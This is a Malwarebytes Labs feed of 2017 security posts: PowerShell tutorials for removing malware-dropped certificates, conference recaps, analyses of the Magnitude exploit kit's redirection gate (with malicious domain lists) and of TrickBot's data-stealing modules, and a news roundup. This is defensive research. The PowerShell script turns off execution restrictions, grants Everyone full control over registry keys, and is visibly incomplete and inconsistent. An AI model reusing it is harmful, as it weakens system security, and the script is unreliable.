Malwarebytes - Fri, 08/04/2017 - 18:00

In the previous posts we have looked at some elementary PowerShell concepts and we have constructed some basic commands to export and compare data.

We did this by using an example of certificates being dumped in the “Untrusted” category by some malware. This time we will try to write a program that can undo these changes.

Remember when running PowerShell scripts, unlike single commands, that you will have to remove any execution restrictions that are in place. This command will allow everything for the current session:

Set-ExecutionPolicy Unrestricted


One of the basic skills in each scripting language is text manipulation. I will need a few of those manipulations, before I’m able to use the html export we created last time, as a source for the list of registry keys that I need to remove. But we know they are all present in that export, so let’s get to it.

To read how we created the comparison.html file have a look at the previous post in this mini-series. First we need to get rid of some unnecessary text that was added during the process of making tables and converting to HTML.

One of the lines we want to get rid off is the header. We could take the easy route and simply delete it, but I want to build in some extra safety, so I will try to remove all the lines that do NOT contain @{Thumbprint= since those are the entries we are interested in anyways.

So how do we do that?

Get-Content c:\users\public\desktop\comparison.html | Select-String -pattern "@{Thumbprint=" | Out-File C:\certain\ceficates1.txt

That command filters out all the lines that do not contain the @{Thumbprint= string and brings the html back to a text file, because txt files are a bit easier to work with.

Now we will need a step to get rid of the table make-up.

click to enlarge

(Get-Content C:\certain\ceficates1.txt) -replace "\<.*?\>","" | Out-File C:\certain\ceficates2.txt

This one looks a bit more complicated because of the regular expression. Regular expressions (regex) are worthy of a topic all by themselves, because of their complexity and usefulness. Maybe another day. This one looks for a “<” and deletes that and everything up to and including the closing “>”.  That got rid of all the <tr>, <td>, </td>, and </tr> bits that were previously needed for the table. The Get-Content call needs to be in parentheses or PowerShell would regard – replace as an argument for that call and throw an error, as -replace is not defined as an argument for that cmdlet.

Now, just for good measure I want to delete all the SideIndicator arrows as well. Note that in the text file they look like this: =&gt; where “&gt;” is the html code for “>”.

(Get-Content C:\certain\certificates2.txt) -replace "=&gt;","" | Out-File C:\certain\certificates3.txt

Now that we have cleaned up the file we can use the next loop to delete the registry keys. And with those keys we effectively delete the certificates.

$List = Get-Content certificates.txt
foreach ($Line in $List) {
$First, $Second, $Third = $Line -split ';'
$Thumbprint= $First -replace("@{Thumbprint=","HKLM:\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\")
If ($Thumbprint.length -eq 108) {
$path = $Thumbprint
$acl = Get-Acl $path
$rule = New-Object System.Security.AccessControl.RegistryAccessRule ("Everyone","FullControl","Allow")
$acl |Set-Acl -Path $path
Remove-Item –Path $path
Write-Host ($path,"removed")

Explanation of what this loop does:

  • It reads the text file line by line and splits each line up using the “;” as a delimiter.
  • The first part of each line contains the Thumbprint, so we can ignore the rest and use only the first part.
  • We replace the text added by the Get-ChildItem ( which is “@{Thumbprint=”) by the path to the registry key that we need (“HKCR:\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\”)
  • As an extra security measure we check if the length of the string equals 108 (the length of the key including the Thumbprint. We do not want to delete random registry keys because of some fluke in the text-files. As an exercise: think what could happen if someone used the “<” in the Subject part of the certificate.
  • Then we give ourselves full control over that same registry key and remove it.
  • Then the program writes to the PowerShell terminal which keys were removed.

When putting the program together I found out that it worked better to move the command that filters out the lines without the @{Thumbprint= string further down, because it caught some lines that were created by some unexpected word-wrap issue. So the final version of my program looks like this:

Get-ChildItem -Path cert:\currentuser\disallowed -Recurse | select Thumbprint, FriendlyName, Subject| Set-Content c:\users\public\desktop\certificatesafter.txt
compare-object (get-content c:\users\public\desktop\certificatesbefore.txt) (get-content c:\users\public\desktop\certificatesafter.txt)| ConvertTo-Html | Set-Content c:\users\public\desktop\comparison.html
Get-Content c:\users\public\desktop\comparison.html | Select-String -pattern "@{Thumbprint=" | Out-File C:\certain\certificates1.txt
(Get-Content C:\certain\certificates1.txt) -replace "\<.*?\>","" | Out-File C:\certain\certificates2.txt
(Get-Content C:\certain\certificates2.txt) -replace "=&gt;","" | Out-File C:\certain\certificates3.txt
Get-Content C:\certain\certificates3.txt | Select-String -pattern "@{Thumbprint=" | Out-File C:\certain\certificates.txt
$List = Get-Content certificates.txt
foreach ($Line in $List) {
$First, $Second, $Third = $Line -split ';'
$Thumbprint= $First -replace("@{Thumbprint=","HKLM:\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\")
If ($Thumbprint.length -eq 108) {
$path = $Thumbprint
$acl = Get-Acl $path
$rule = New-Object System.Security.AccessControl.RegistryAccessRule ("Everyone","FullControl","Allow")
$acl |Set-Acl -Path $path
Remove-Item –Path $path
Write-Host ($path,"removed")
del C:\certain\certificates1.txt
del C:\certain\certificates2.txt
del C:\certain\certificates3.txt
del C:\certain\certificates.txt

Using it

In case you are interested how to use this.

In theory we would have created a folder C:\certain that holds the script (the one directly above) which is then also in use as a temporary storage for all the different text files.

On the public desktop there is the text file that holds the “Before” set of certificates. On a VM that could be a part of the snapshot.

So, all we have to do to get an overview in html off the added certificates and remove them at the same time:

  • Run Powershell as Administrator
  • Command: Set-ExecutionPolicy Unrestricted
  • Confirm with a Y
  • Command: cd c:\certain to change the directory
  • Command: .\certsfinal.ps1 to run the script

And behold, we will have c:\users\public\desktop\comparison.html with our list of added certificates and the list in the terminal to confirm that they were removed.


A word of warning for those who want to repeat this on their own VM: make sure to kill the certsdropper process as it will re-add the certificates if it’s still active. And make sure only to try it on a VM as the certificates are not the only changes it makes.

I hope you found this useful. I am well aware there are more efficient ways to do this, but all your possible improvements are welcome in the comments


Strings in PowerShell – Replace, compare, concatenate, split, substring


Pieter Arntz

The post Learning PowerShell: basic programs appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Malwarebytes - Fri, 08/04/2017 - 16:11

After a few days in Las Vegas and after BlackHat, DEFCON 25 is finally over! It was an amazing time around awesome people.

I didn’t attend all the talks, but most of the ones I saw were interesting:

This talk presented several ways to bypass protections against DNS rebinding, and ways to access data from an internal network using these techniques. Several mitigations were also presented, one of them being, to not use strong authentication only for external resources, but to enforce them for internal resources as well. He released Jaqen, a tool used to reliably execute DNS rebinding attacks using different methods.

This talk presented the weird behavior of URL parsers and how to get a RCE in Github Enterprise using a chain of four vulnerabilities exploiting SSRF.

Tor developers have been working on a new generation of Onion Services to make them stronger to resist censorship and to provide several interesting features that the current generation doesn’t have. This talk also explained that {Dark, Deep}Web is not really a thing and is most of the time used as a marketing nonsense term: the biggest website using Tor Onion Services is actually… Facebook.

This talk presented the impressive research and results from Google and CWI which led them to get a way to get SHA1-collisions after several years of work and intense computations. Some unexpected consequences have also been presented, like the Webkit repository corruption. Counter crypt-analysis mechanisms used to detect these collisions implemented in Gmail and Github have also been explained.

  • Breaking Wind: Adventures in Hacking Wind Farm Control Networks, by Jason Staggs.

This talk presented internals of wind turbine control networks, and how security is totally absent from their design: unauthenticated APIs, flat network, false security claims from vendors…

This talk presented a very cheap (but efficient) way to leverage DDoS and bruteforce attacks against websites and OTP systems, using several Microservices providers.

This talk presented interesting ways to use webhooks and Github as a broker C&C to exfiltrate data in a constrained environment. Github issues and comments were used as a communication channel. A proposed mitigation: to restrict outbound access to required Github repositories only.

This nice and technical presentation explaining the process to get Ring0 exploits primitives using GDI, and analyzing security issues MS16-098 + MS17-017 with the first standpoint.

This talk presented the new features and developments related to Windows Defender galaxy…. and how to get around the new defense mechanisms introduced in latest Windows 10 versions.

Apart from these talks, villages and panels were very exciting places to attend. SE-Village, Recon-Village, Crypto and Privacy Village, Voting Machine Hacking Village and Packet Hacking village were particularly great! Also, the EFF panel on Friday night was nice to get updates and discussions from EFF directors and attorneys.

Recorded presentations and workshops are available on .

This was a nice (but very crowded!) edition, looking forward to next year!

The post DEFCON 25 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Black Hat USA 2017 Recap

Malwarebytes - Wed, 08/02/2017 - 21:54

What do you get when you put hackers, gambling, and dogs together? Black Hat USA 2017  …and a random zoo conference happening next door. Last week, we wrapped up another successful trip to Las Vegas for Black Hat. For those of you who couldn’t make it or had too much Vegas fun and need a reminder of what happened, here’s a little recap for you.


Every year Black Hat, the world’s leading information security event series in the world, hosts a six-day conference in Las Vegas. The conference and technical training sessions focus on the latest research, development, and trends in the cybersecurity space. This year Black Hat hit a major milestone by celebrating its 20th year in hosting these events.

Hot topics

In the last couple of years, we’ve noticed a lot of conversation about AI machine learning  – specifically this year focused on AI Machine Learning Neutral Networks in the security industry. The general belief is that AI alone will help defeat all malware and move us into the new age. That’s not going to happen – in our opinion. All these AI talks seem to forget one important thing. How exploitable and manipulative a machine learning database and algorithm can be. They are extremely prone to be poisoned and easy to bypass when you know what you’re doing.

There were a million talks this year and last about AI machine learning and how you can use it to detect malware and defeat exploits and so on and so forth, however it will never be practical in the way the talks are pushing. AI will do amazing things in the background of security companies and in unison with other security functions though.

Booth action

The Malwarebytes booth was as hot as the hippest DJ playing at the “it” club in Vegas. ZERO the robot was a crowd favorite per usual. Our product marketing team (Dana & Helge) broke down the current threat landscape, went into detail about Jaff ransomware, and talked about our latest business products – Endpoint Protection and Incident Response.

Click to view slideshow.



Black Hat always seems to bring around a talented group of professionals. We’re happy we can participate in this event each year and spend some time meeting everyone. It seems like AI will continue to be a hot topic, it will be interesting to see what updates are to come in the next year.

Thank you to all those that stopped by the Malwarebytes booth. See you next year!

The post Black Hat USA 2017 Recap appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Enemy at the gates: Reviewing the Magnitude exploit kit redirection chain

Malwarebytes - Wed, 08/02/2017 - 15:00

Over the last few months, we have been keeping an eye on the Magnitude exploit kit which is mainly used to deliver the Cerber ransomware to specific countries in Asia. Our telemetry shows that South Korea is most impacted via ongoing malvertising campaigns.

When a visitor goes to a website that monetizes its traffic via adverts he may be exposed to malicious advertising. Tailored ads shown in the browser are initiated on-the-fly via a process known as Real-time Bidding (RTB). Unfortunately, crooks will take advantage of this process by deceiving and abusing ad agencies, trying to win the online auction to serve their malicious content.

Figure 1: Typical redirection flow via Magnigate to Magnitude EK

In addition to traffic filtering performed by various ad networks, users are inspected at a ‘gate’ that decides whether or not they should be allowed to proceed to Magnitude EK. This gate, which has been nicknamed ‘Magnigate’ by Proofpoint [1], performs additional checks on the visitor’s IP address and user-agent to determine their geolocation, Internet Service Provider, Operating System and browser information.

Double purpose

Magnigate serves two goals: to be a decoy site for non-intended targets or to be a redirection mechanism to Magnitude EK (or a social engineering scheme [1]) for the visitors that meet its requirements. In other words, seeing the content of the bogus site means the redirection to Magnitude EK has failed. During our tests, we also noticed that the gate can send a 404 or 502 HTTP status code.

Figure 2: Magnigate leads to e-cig decoy site (avoidance) or Magnitude EK (real target)

Beginnings: 2013-2014

Using publicly available packet captures as well as our own honeypots, we go back in time and explore the history and evolution of this gate. Note: this post does not intend to be completely exhaustive and the reader should know that there are other redirection chains than the ones solely presented here.

Early packet captures are hard to find publicly but PCAPs from mid-2013 and 2014 show various techniques used to redirect users to Magnitude EK.

302 redirect

This one shows a 302 redirect from a possibly compromised site in August 2013 although malvertising was also an infection source at the time (MalwareDontNeedCoffee [2]). The PCAP comes from

Figure 3: A site performing a redirection to Magnitude EK in the summer of 2013


In January 2014, we can see iframe insertions on compromised sites to redirect to a second stage server that performs the 302 redirect to the EK. The PCAP comes from

Figure 4: iframe injections resulting in 302 redirect to Magnitude EK


Yet another redirection technique is seen in this March 2014 capture. (Side note: the website pictured below remains hacked, even 3 years later). The PCAP comes from

Figure 5: A compromised site leading to Magnitude EK in the winter of 2014

JS injection to iframe

In this September 2014 snapshot, we see a compromised website with a malicious JS injected into it. The PCAP comes from

Figure 6: This external JavaScript calls a Magnitude EK landing page


In October 2014, we see an interesting redirection technique involving steganography which was not obvious at first. The malicious redirect URL is stored in an image file hosted on the hacked site (data.png). It’s a poor name choice for a file designed to conceal… data, considering the effort that was put into the JavaScript function that decodes it.

The PCAP comes from

Figure 7: An interesting and covert way to redirect traffic from a hacked site via steganography

A more ‘predictable’ gate: late 2014-2015

In November 2014, there is an interesting change with the redirecting infrastructure. A compromised site is injected with a hex encoded script that performs the first redirection to a .eu domain. It is the next domain called, which performs the final call to the Magnitude EK landing page. It’s noteworthy that the ‘.ws’ domain and the Magnitude EK landing are in the same IP space and both running Apache 2.2.15 and PHP 5.3.3. In the following month, we also witnessed the gate sharing the same server software specs (although in different IP spaces).

The PCAP comes from ThreatGlass.

Figure 8: Overlapping infrastructure specs between gate and EK in this Fall 2014 capture

The use of decoy sites in Magnitude EK campaigns may have started in late 2014 or early 2015. Below is an example of such a site ( where traffic originated from malvertising. The fake sites are designed to confuse analysts and have used various themes over time such as finance, gaming, e-cigs, etc.

Figure 9: The use of decoy sites has been a popular trend

Fingerprinting: 2016

A new twist to the gate happened around March 14, 2016. So far, the redirections we had observed had been via one single web request but over the course of a few days, we witnessed the emergence of an added step which also contained ‘fingerprinting’ code. (Side note: According to MalwareDontNeedCoffee the fingerprinting code was already in Magnitude’s main landing page before).

Figure 10: Fingerprinting the user via the browser is shown here in the gate to Magnitude EK

A little over a month later and the fingerprinting gate is gone, replaced by a simple 302 redirect.

Figure 11: A ‘simple’ redirection flow

Sometime later, the first part of the gate changes slightly and reveals the detection of the Kaspersky virtual keyboard:

Figure 12: Detecting (and avoiding) users that have Kaspersky software installed

It was only a matter of time before things changed again. The Kaspersky check gets switched to the second part of the gate.

Figure 13: A switch around for the Kaspersky keyboard detection

Obfuscation: Fall 2016

In the Fall of 2016, an important change happened with Magnitude EK as it was no longer rented as a toolkit, but instead became the sole use of one actor who decided to focus on targeting Asia, and in particular, South Korea, delivering the Cerber ransomware [1].

During the months that followed, the gate which by now was publicly known as ‘Magnigate’, went through some code obfuscation on top of the server side checks to filter traffic by user-agent and geolocation [1]. This meant that capturing Magnitude EK in the wild became more difficult without a proper set-up.

Figure 14: Various encodings in use by Magnigate over the course of a few months

More encoding: July 2017

The latest version of Magnigate has yet different encoding. Here’s a quick look at it.

Figure 15: Magnigate seen in July 2017

Figure 16: Step 1 in the Magnigate redirection flow

Figure 17: Step 2 in the Magnigate redirection flow

Step 0 in the gate?

We spotted an instance where there was a redirect loop within the gate itself before finally carrying on with the usual path. This ‘extra’ check did not happen all the time though, suggesting it is either something still in development or being selectively tested.

The server infrastructure is also quite puzzling, with for example Microsoft IIS instead of the standard Apache we normally see, and residing on an IP address ( located in South Korea.

Figure 18: An interesting detour before the normal Magnigate flow

A closer look at the code used in this pre-step 1 stage reveals various types of fingerprinting, for example checking the local IP address and detecting the video driver installed.

Figure 19: Getting the current user’s local IP address via the RTCPeerConnection trick

Figure 20: Canvas fingerprinting used to identify the user’s video driver

Whatever the exact purpose of this pre-gate is, it is performing some in-depth checks on the current visitor and passing those as parameters within the URL. Only time will tell if this becomes integrated as a de facto check, or whether this was some kind of temporary trap for honeypots.

Gates and exploit kits

A gate is not required in order to perform a successful drive-by infection so long as there is an existing redirection mechanism in place (via compromised sites or malvertising). However, gates provide an efficient way to do final traffic filtering before wasting resources on non-intended targets. It’s also a very effective means of preventing honeypots and security researchers from poking their nose into your business or perhaps tracking and logging their activity. Some exploit kits like Astrum EK do some heavy filtering throughout the infection chain to be as stealthy as possible, resulting in little information known about their malvertising campaigns or the exploit code they use.

It’s quite likely that Magnigate will continue to evolve but the question is whether these will be slight cosmetic changes (different obfuscation techniques) or more substantial (new detection or evasion techniques).

Malwarebytes users are protected against Magnitude EK thanks to our signature-less anti-exploit module.


[1] Cerber, not the only payload:



I would like to thank David Ledbetter and Manuel Caballero for their help in this research.

Indicators of compromise

Magnigate Regex


Magnigate domains (step 1)

paypalinvest[.]info bestmoneyinvest[.]net roundgames[.]biz aroundgamez[.]org arcencielfoundation[.]org planetofsgames[.]com lebhaile[.]com sextizer[.]net pyfxmoney[.]com blowyourmindvape[.]com letsvapes[.]com letsdovape[.]com letsovape[.]com

Magnigate fully qualified domains (step 2)

cdi3e82hac4p.boxaims[.]com f344709fpep0ue412r.dieowed[.]com 4lfcfq6a7g94.rarekid[.]com 0adci9j7d7l46e.asmight[.]com d88o9cd59.endsits[.]com c00x28g6c54fax0br.ordrink[.]com 28cdw96cl1do5.givesup[.]com 2a2l2xfcffcb66v.hesoff[.]com 38ffa328261.isleave[.]com 6d82p5d2v0e4ft105s.owesdo[.]com 175c2a53f64lbr64w.milered[.]com e4cua85j8w06crek833x.helpfix[.]stream 70i4o34b724q.bestbusy[.]site 7a48s4eu85kaeu4p3.doebulk[.]com 906q2u4567021q.usfixes[.]com 93c452ci0.deskif[.]com

IP addresses

The post Enemy at the gates: Reviewing the Magnitude exploit kit redirection chain appeared first on Malwarebytes Labs.

Categories: Techie Feeds

TrickBot comes with new tricks – attacking Outlook and browsing data

Malwarebytes - Tue, 08/01/2017 - 19:10

Last year we reported about a new modular malware using a network protocol similar to Dyreza – you can read about it here. The malware was not very stealthy and some parts were looking to be under development, but we noticed its potential and capability to be easily extended. Indeed, authors of TrickBot are persistent not only in spreading their product but also in developing new features.

Some of the novel changes have been noted in the report of Security Art Work (available here).

In addition, it has been found, that developers added to the bot a worm module – probably inspired by the success of worm-equipped ransomware (WannaCry, EternalPetya).

But authors of the malware didn’t stop on this – recently we captured some additions – for example, the one called Outlook.dll. While most of the modules are written in C++, this one is written in Delphi. It may indicate that the team of developers gained some new members that are more comfortable with this particular language.

Analyzed samples

Downloaded modules (32 bit):

Behavioral analysis

As before, after being deployed TrickBot installs itself in a new directory created in %APPDATA%. It runs a new instance from the installation directory.

Inside, it creates another directory – Modules, where it drops downloaded modules and their configuration files in encrypted form:

The way in which the modules and configuration files are encrypted didn’t change – still, we can use the same scripts to recover them.

After decrypting config.conf we got some more details about the current campaign – the version of the analyzed configuration is 1000030 and the given group tag is tt0002. Fragment:

As before, the persistence is achieved with the help of Scheduled Task:

The task deploys the main bot, that after being run, decrypts and loads other modules. Each module is injected into a new instance of svchost:


As before, all the TrickBot modules follow a predefined API. They export four functions:

  • Control
  • FreeBuffer
  • Release
  • Start

As mentioned in the section “behavioral analysis”, in the current run we observed 5 modules. SystemInfo.dll and loader.dll (injectDll32) are present in the TrickBot since the very beginning. The module mailsearcher.dll has been introduced in December 2016 (according to the F5 DevCentral’s article). But there are some modules in the set, that we haven’t seen described before: module.dll and Outlook.dll.

module.dll/importDll32 Overview

This bulky module is written in C++, compiled with Qt5, OpenSSL and also incorporates SQLite. Inside the binary we can find the strings indicating particular versions of the libraries:

  • Qt 5.6.2 (i386-little_endian-ilp32 static release build; by GCC 6.2.0)
  • OpenSSL 1.0.2k 26 Jan 2017
  • 2017-02-13 16:02:40 ada05cfa86ad7f5645450ac7a2a21c9aa6e57d2 (SQLite)

We can also find references in the code – in the given example QAbstractSocket class from Qt library is used:

DLL’s compilation timestamp indicates that it is pretty fresh, written in May of this year:

2017:05:27 14:27:06+01:00

Functionality-wise, this module is focused on stealing data from the browsers, such as:

  • Cookies
  • HTML5 Local Storage
  • Browsing History
  • Flash LSO (Local Shared Objects)
  • URL hits

…and more.

Authors didn’t put any effort to hide their intentions. Debug strings informing about every action taken are being printed. Examples:

Grabbing URL hits:

In contrary to loader.dll/injectDll (referenced here) which is modular and stores all the scripts and targets in dedicated configuration files, module.dll/importDll32 comes with all the data hardcoded. For example, we can find inside the binary a very long list of targets – websites from countries all around the world – France, Italy, Japan, Poland, Norway, Peru and more:

Browser fingerprinting

During its run the module creates a hidden desktop:

This desktop is used as a workspace, where the malicious module can open and fingerprint browsers in a way that is not noticed by the user.

Inside the malware’s code we can find some hardcoded HTML files with javascripts that are used for gathering information about the browser’s configuration. For example:

You can see the full content here.

This script, while being executed fills the text area with the data gathered about the environment, and passes this data to the malware:

Another script is used for gathering information on the plugins installed in InternetExplorer (compare with this script):

You can see the full content here.

The scripts send the collected data in the POST request in the variable called marker_:

The data is received by the handler inside the TrickBot module:

Interestingly, the malicious plugin contains also 4 base64 encoded pictures in PNG format:

Decoded pictures:

The SQL part

Among the data hardcoded within the module.dll we can find a string referencing an SQLite release:

2017-02-13 16:02:40 ada05cfa86ad7f5645450ac7a2a21c9aa6e57d2

The incorporated SQLite is used to retrieve and steal from locally stored databases, for example cookies (similarly to Terdot Zbot, described here, that also incorporated SQLite for this purpose):

Sample strings and queries to the cookies database:

We can see also queries used for stealing the stored browsing history:


This is the module written in Delphi. It contains a hardcoded configuration that follows a pattern typical for TrickBot modules:

<moduleconfig> <autostart>no</autostart> </moduleconfig>

Its purpose it to steal data saved by Microsoft Outlook.

The module opens relevant registry keys, and tries to retrieve saved credentials:


TrickBot’s new modules are not written very well and they are probably still under development. The overall quality of the design is much lower than the quality of the earlier code. For example, module.dll is bulky and does not follow the clean modular structure introduced by TrickBot before. Also, they make use of languages and libraries that are easier – Qt instead of native sockets for module.dll, Delphi language for Outlook.dll. Those changes may indicate some changes in the development team – either they gained new members that has been delegated to the new tasks or some of the previous members resigned and has been substituted by lower quality programmers. It may also be possible, that they are doing some prototyping and experiments for the further development.

Anyways, as we can see, TrickBot is still actively maintained and it is not going to leave the landscape any soon.

This was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest in InfoSec. She loves going in details about malware and sharing threat information with the community. Check her out on Twitter @hasherezade and her personal blog:

The post TrickBot comes with new tricks – attacking Outlook and browsing data appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Learning PowerShell: some basic commands

Malwarebytes - Tue, 08/01/2017 - 15:00
My first Powershell script

The first PowerShell script I wrote (see below) was a quick fix to remove certificates from the “Untrusted” registry key after a Vonteera infection. After some initial commands, this script basically loops back for every certificate that doesn’t belong under a certain key.

$path = "HKLM:\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates\C1437F2BC6F11..."
$acl = Get-Acl $path
$rule = New-Object System.Security.AccessControl.RegistryAccessRule ("Everyone","FullControl","Allow")
$acl |Set-Acl -Path $Path
Remove-Item –Path $path

What it does is:

  • Define the path to the key
  • Set the permissions for that key
  • Remove the key
Current challenge

The problem I have been faced with is finding the hexadecimal values that were the registry keys of the certificates. I have had to take registry snapshots before and after the infection to find out which ones were added. Getting an overview of the certificates that are present before the infection is not that difficult. Deciding what information to keep and how to store it is less trivial.

I ended up with this command, which I will explain in detail as this is a learning experience:

Get-ChildItem -Path cert:\currentuser\disallowed -Recurse | select Thumbprint, FriendlyName, Subject | ConvertTo-Html | Set-Content c:\users\public\desktop\certificates.html

The cert: drive is provided by the Windows PowerShell Certificate Provider, and using the Get-ChildItem cmdlet lets you get certificate store locations, certificate stores, and certificates from it.

They have chosen the “disallowed” path as that is where some malware samples have been known to block the download and operation of certain security programs. But of course, you can change that to any of the other possibilities you might be interested in.

The “Recurse” parameter allows me to search subdirectories of the “path”.

I want to see these properties of each certificate:

  • Thumbprint, because that is the name of the registry key
  • FriendlyName, because that shows the reason for the certificate not to be trusted (which is sometimes helpful)
  • Subject, because that is the one that holds the humanly readable information we can see in the certmgr

The last two bits of the command are necessary to prepare the output for export and to define the export location. I choose the public desktop so everybody can copy the command without having to change it to fit their own circumstances. And I have decided on HTML because that gives me a nice table.

So, taking a snapshot is one thing. Now, we have to compare the sets of certificates before and after infection. Luckily, there is an obvious choice, which is the compare-object cmdlet.

click to enlarge

To compare the new set of certificates with an older snapshot, I have changed the previous command a little bit, for practical reasons. Below is the command to export it to a text file:

Get-ChildItem -Path cert:\currentuser\disallowed -Recurse | select Thumbprint, FriendlyName, Subject| Set-Content c:\users\public\desktop\certificates.txt

I have made the change to avoid getting tables within tables when I do this comparison on text files. To have something to compare with, in this case, I have used the certificate dropper section of a malware file we detect as Trojan.Wdfload. Wdfload is an infection that combines a bitcoinminer with a module that disables the download and use of antimalware software by altering the hosts file and dropping certificates in the Untrusted category. After running the command above, before and after the infection, I also renamed the corresponding files to add before and after to the filenames. And used this command to get yet another easy to read output file.

compare-object (get-content c:\users\public\desktop\certificatesbefore.txt) (get-content c:\users\public\desktop\certificatesafter.txt)| ConvertTo-Html | Set-Content c:\users\public\desktop\comparison.html

Let’s look at the above image again. The SideIndicator column is added by the compare-object cmdlet. It shows on which side of the comparison the line was an extra compared to the other. In this case the arrows indicate whether a certificate was added ( => ) or whether it was removed ( <= ).

The certs dropper I used does not add any FriendlyName items, which is why that column shows up empty in the screenshot above.

So far we have concentrated on creating some useful PowerShell commands. Next time I will attempt to write a Powershell script that uses my output (or a smaller version of it) to remove the certificates that were added by the certsdropper without me having to hardcode all the registry key names manually.

Earlier in this series:

Your comments and constructive criticism are welcome.

The post Learning PowerShell: some basic commands appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (July 24 – July 30)

Malwarebytes - Mon, 07/31/2017 - 19:21

Last week, we recognized one of the unsung heroes of our times, explained what the Dark Web is, revealed challenges one of our experienced when putting together his conference presentation for SteelCon, revealed the potential dangers of smart toys to kids, and made a prediction following the arrests made against those involved in Fireball.

We also talked about encryption and law enforcement, Petya’s decryption key, and talked about the real problem with ransomware with accompanying statistics, which you can find from the respective links below:

The real problem with ransomware

The state of ransomware among SMBs

Below are notable news stories and security-related happenings from last week:

Latest updates for Consumers
  • Top Ten Lessons Learned From WannaCry. “…the WannaCry ransomware variant changed the view of ransomware globally, mainly due to its ability to capture multiple major businesses and critical infrastructure. The cyber-attack that hit the NHS and businesses around the world made headline news globally, bringing awareness about ransomware – and indeed cybersecurity – to the masses.” (Source: InfoSecurity Magazine)
  • Mysterious Mac Malware Has Infected Victims for Years. “The second version of FruitFly is even more puzzling, according to Patrick Wardle, the former spy agency hacker who now develops free security tools for Apple computers and researchers Mac security for the firm Synack. Wardle told Motherboard in a phone call that when he first discovered FruitFly 2, no antivirus software detected it. More surprisingly, it looks like it has been lurking around for five or 10 years and infected several hundred users.” (Source: Motherboard)
  • The Stantinko Botnet Is Back After Years Under The Radar. “ESET researchers alert that Stantinko – a huge botnet which hasn’t been detected for the past five years – is now not only back but it also managed to infect half a million systems and allow its developers to ‘execute anything’ on the infected machine. The botnet was used for a massive adware campaign in 2012 that was primarily targeting Ukraine and Russia. However, thanks to its ability to adapt really quickly and avoid detection as well as the code encryption, Stantinko managed to stay under the radar all this time.” (Source: Virus Guides)
  • Your Old Phone Number Can Be Used To Hack Facebook Account. “We all know that in most cases, Facebook users are required to submit their phone number while registering with the social network. This is how they can link their phone with the profile so that when a user forgets the password, they can prove his authenticity and receive a new password on their smartphone. However, in case the user stops using the phone number linked to their Facebook profile and changes it to another one, there are chances that the previous number can be assigned to someone else. This is where the problem begins.” (Source: HackRead)
  • Segway MiniPro Patched To Stop Hackers Hijacking Remote Control From Hoverboard Riders. “Critical security vulnerabilities have been discovered in the Segway/Ninebot MiniPro Hoverboard, but don’t panic – firmware patches have already been issued to prevent malicious hackers from attacking the devices. Which is a relief – as successful exploitation of the security holes could have seen attackers seize remote control of a hoverboard and potentially injure riders by suddenly disabling the motor.” (Source: Tripwire’s State of Security)
  • AI Cyber Wars: Coming Soon To A Bank Near You. “The battle between cyber criminals and banks is an intensifying arms race. Cyber criminals are racing to develop new offensive weapons while the banks and insurers they are targeting are scrambling to keep pace.Financial institutions are increasingly deploying Robotic Process Automation (RPA) and other early-stage AI technologies to the front lines, identifying the behavior of trustworthy users and detecting emerging threats. However, much cutting-edge software in areas such as machine learning and AI is open-sourced, meaning that it is readily available to the wrong side.” (Source: Forbes)
  • Discover Launches Social Security Number Alert Feature. “There’s a corner of the internet, inaccessible by traditional search engines, where stolen personal information can be sold anonymously. A new feature announced this week from Discover aims to shed a little more light into that corner. Discover says the new service alerts cardholders when their Social Security number appears on certain websites on the so-called ‘dark web.'” (Source: NerdWallet)
  • Letting Cyberattack Victims Hack Back Is A Very Unwise Idea. “As the rate of cybercrime increases, so too does the intensity of those attacks. Now, companies like the UK’s Pervade Software are exploring new digital weapons with the goal of better protecting themselves and recovering stolen data. These include turnkey denial-of-service attacks and actions that damage the accused hackers’ computers and data. But taking advantage of tools more appropriate for a vigilante climate will have serious consequences for the health of the internet.” (Source: Wired)
  • New Form of Cyber-Attack Targets Energy Sector. “In the attacks so far picked up by Israel-based cybersecurity company CyberInt, a ‘lure’ document masquerades as a curriculum vitae accompanying a harmless email. What makes this latest type of spear-phishing attack hard for the energy companies to identify is that the lure email and attached Word document are totally clean and contain no malicious code whatsoever. They are therefore undetectable to incoming email monitoring defenses.” (Source: InfoSecurity Magazine)
  • Bots Make Lousy Dates, But Not Cheap Ones. “Bill installed the dating app on his smartphone. To his surprise, he was quickly matched up with several women he found attractive. Better yet, they immediately showed their interest by sending him text messages. ‘One’s a flight attendant and three are models!’ he told his friends over coffee. ‘Why didn’t I jump into online dating years ago?'” (Source: Dark Reading)
  • Officials Arrest Suspect In $4 Billion Bitcoin Money Laundering Scheme. “Police in Greece have arrested a man wanted in the United States for allegedly running a massive Bitcoin-based money laundering operation, according to the Associated Press. Authorities say the 38-year-old Russian man was responsible for converting $4 billion in illicit, conventional cash into virtual currency.” (Source: Ars Technica)
  • Malware Creators Increasingly Run Their Business Like Legitimate Software Companies. “The continuing increase in ransomware attacks is, partly, due to how easy the malware can be built and used by attackers that have limited technical skills. Take for example the Philadelphia Ransomware-as-a-Service (RaaS) offering. Offered for sale by a group (or individual?) that calls itself The Rainmakers Labs, it is just a part of the overall arsenal of ‘anti-security solutions’ on offer.” (Source: Help Net Security)
  • Google Discovers New Lipizzan Android Spyware. “Google’s Android Security team announced today the discovery of a new powerful Android spyware — named Lipizzan — which Google claims to be linked to Equus Technologies, an Israeli company that describes itself on its LinkedIn page as being specialized ‘in the development of tailor made innovative solutions for law enforcement, intelligence agencies, and national security organizations.'” (Source: Bleeping Computer)
  • Gas Pump Skimmer Sends Card Data Via Text. “Skimming devices that crooks install inside fuel station gas pumps frequently rely on an embedded Bluetooth component allowing thieves to collect stolen credit card data from the pumps wirelessly with any mobile device. The downside of this approach is that Bluetooth-based skimmers can be detected by anyone else with a mobile device. Now, investigators in the New York say they are starting to see pump skimmers that use cannibalized cell phone components to send stolen card data via text message.” (Source: KrebsOnSecurity)
